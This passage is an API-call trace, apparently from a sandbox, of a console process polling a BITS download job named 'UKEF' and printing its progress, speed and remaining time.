wAttributes=0xf) returned 1 [0047.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0047.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x10) returned 1 [0047.398] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0047.399] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x1ee888 | out: _Buffer="49 Seconds") returned 10 [0047.399] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeaf0 | out: lpConsoleScreenBufferInfo=0x1eeaf0) returned 1 [0047.399] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb30, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb30*=0xa) returned 1 [0047.399] CoTaskMemFree (pv=0x276f30) [0047.399] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0047.399] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0048.398] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0048.398] KillTimer (hWnd=0x0, uIDEvent=0x7fc9) returned 1 [0048.398] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0048.398] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0057.036] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0057.036] TranslateMessage (lpMsg=0x1efa28) returned 0 [0057.036] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0057.036] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0057.036] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0057.037] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc6 [0057.037] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eebc8 | out: pVal=0x1eebc8) returned 0x0 [0057.038] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0057.038] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eebd0 | out: pVal=0x1eebd0) returned 0x0 [0057.039] CoTaskMemFree (pv=0x0) [0057.039] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eebd8 | out: pVal=0x1eebd8*="UKEF") returned 0x0 [0057.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0057.039] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eeb38 | out: lpNumberOfCharsWritten=0x1eeb38) returned 1 [0057.040] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eeb38 | out: lpNumberOfAttrsWritten=0x1eeb38) returned 1 [0057.040] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0057.040] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.040] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.040] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0057.040] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.065] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.065] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0057.066] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.066] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.066] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x7) returned 1 [0057.066] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.066] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.066] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0057.066] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.066] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.067] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0057.067] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.067] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xe) returned 1 [0057.067] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.067] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.067] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0057.068] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x6) returned 1 [0057.068] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.068] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.068] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0057.068] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.068] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0057.068] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="1") returned 1 [0057.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.069] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0057.069] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0057.069] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0057.069] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.069] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="87706") returned 5 [0057.069] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="196608") returned 6 [0057.069] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="44") returned 2 [0057.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0x27f1f570, dwHighDateTime=0x1d38a44)) [0057.069] _finite (_X=0x1eeb30) returned 1 [0057.069] _finite (_X=0x7ff0000000000000) returned 1 [0057.069] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0057.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x16) returned 1 [0057.070] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.070] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0057.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xf) returned 1 [0057.070] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.070] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x1ee888 | out: _Buffer="4.30 KB/S") returned 9 [0057.070] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0057.070] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xa) returned 1 [0057.071] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0057.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0057.071] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x10) returned 1 [0057.071] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0057.071] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x1ee888 | out: _Buffer="25 Seconds") returned 10 [0057.071] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeaf0 | out: lpConsoleScreenBufferInfo=0x1eeaf0) returned 1 [0057.071] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb30, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb30*=0xa) returned 1 [0057.071] CoTaskMemFree (pv=0x276f30) [0057.080] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0057.080] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0058.039] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0058.039] KillTimer (hWnd=0x0, uIDEvent=0x7fc6) returned 1 [0058.039] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0058.039] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0067.371] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0067.371] TranslateMessage (lpMsg=0x1efa28) returned 0 [0067.371] DispatchMessageW (lpMsg=0x1efa28) returned 0x1 [0067.371] IBackgroundCopyCallback:JobModification (This=0x263c30, pJob=0x263d18, dwReserved=0x0) returned 0x0 [0067.371] IBackgroundCopyJob:GetState (in: This=0x263b58, pVal=0x263c48 | out: pVal=0x263c48) returned 0x0 [0067.372] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fc5 [0067.372] IBackgroundCopyJob:GetType (in: This=0x263b58, pVal=0x1eebc8 | out: pVal=0x1eebc8) returned 0x0 [0067.373] IBackgroundCopyJob:GetProgress (in: This=0x263b58, pVal=0x263c50 | out: pVal=0x263c50) returned 0x0 [0067.373] IBackgroundCopyJob:GetPriority (in: This=0x263b58, pVal=0x1eebd0 | out: pVal=0x1eebd0) returned 0x0 [0067.374] CoTaskMemFree (pv=0x0) [0067.374] IBackgroundCopyJob:GetDisplayName (in: This=0x263b58, pVal=0x1eebd8 | out: pVal=0x1eebd8*="UKEF") returned 0x0 [0067.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeb00 | out: lpConsoleScreenBufferInfo=0x1eeb00) returned 1 [0067.374] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x1eeb38 | out: lpNumberOfCharsWritten=0x1eeb38) returned 1 [0067.374] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x1eeb38 | out: lpNumberOfAttrsWritten=0x1eeb38) returned 1 [0067.375] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1 [0067.375] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.375] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0067.375] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.375] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0067.376] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.376] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.376] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x7) returned 1 [0067.376] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.376] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.376] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0067.376] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.377] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0067.377] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.377] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xe) returned 1 [0067.377] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.377] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.378] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0xa) returned 1 [0067.378] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.378] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x6, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x6) returned 1 [0067.378] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.378] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0067.379] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.379] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="0") returned 1 [0067.379] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="1") returned 1 [0067.379] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.379] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x5) returned 1 [0067.379] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.379] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeac0 | out: lpConsoleScreenBufferInfo=0x1eeac0) returned 1 [0067.379] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x1eeb00, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb00*=0x8) returned 1 [0067.379] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.380] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="180902") returned 6 [0067.380] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="196608") returned 6 [0067.380] _vsnwprintf (in: _Buffer=0xff2ebfa0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x1eeb18 | out: _Buffer="92") returned 2 [0067.380] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eeb30 | out: lpSystemTimeAsFileTime=0x1eeb30*(dwLowDateTime=0x2e176250, dwHighDateTime=0x1d38a44)) [0067.380] _finite (_X=0x1eeb30) returned 1 [0067.380] _finite (_X=0x7ff0000000000000) returned 1 [0067.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0067.380] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x17) returned 1 [0067.380] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0067.380] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xf) returned 1 [0067.380] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.381] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x1ee888 | out: _Buffer="7.47 KB/S") returned 9 [0067.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0067.381] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0xa) returned 1 [0067.381] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0067.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eea80 | out: lpConsoleScreenBufferInfo=0x1eea80) returned 1 [0067.381] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1eeac0, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeac0*=0x10) returned 1 [0067.381] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0067.381] _vsnwprintf (in: _Buffer=0x1ee8d0, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x1ee888 | out: _Buffer="2 Seconds") returned 9 [0067.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eeaf0 | out: lpConsoleScreenBufferInfo=0x1eeaf0) returned 1 [0067.382] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xff2dff40*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x1eeb30, lpReserved=0x0 | out: lpBuffer=0xff2dff40*, lpNumberOfCharsWritten=0x1eeb30*=0x9) returned 1 [0067.382] CoTaskMemFree (pv=0x276f30) [0067.382] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0067.382] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x1efa08*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1 [0068.382] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 1 [0068.382] KillTimer (hWnd=0x0, uIDEvent=0x7fc5) returned 1 [0068.382] PeekMessageW (in: lpMsg=0x1efa28, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1efa28) returned 0 [0068.382] 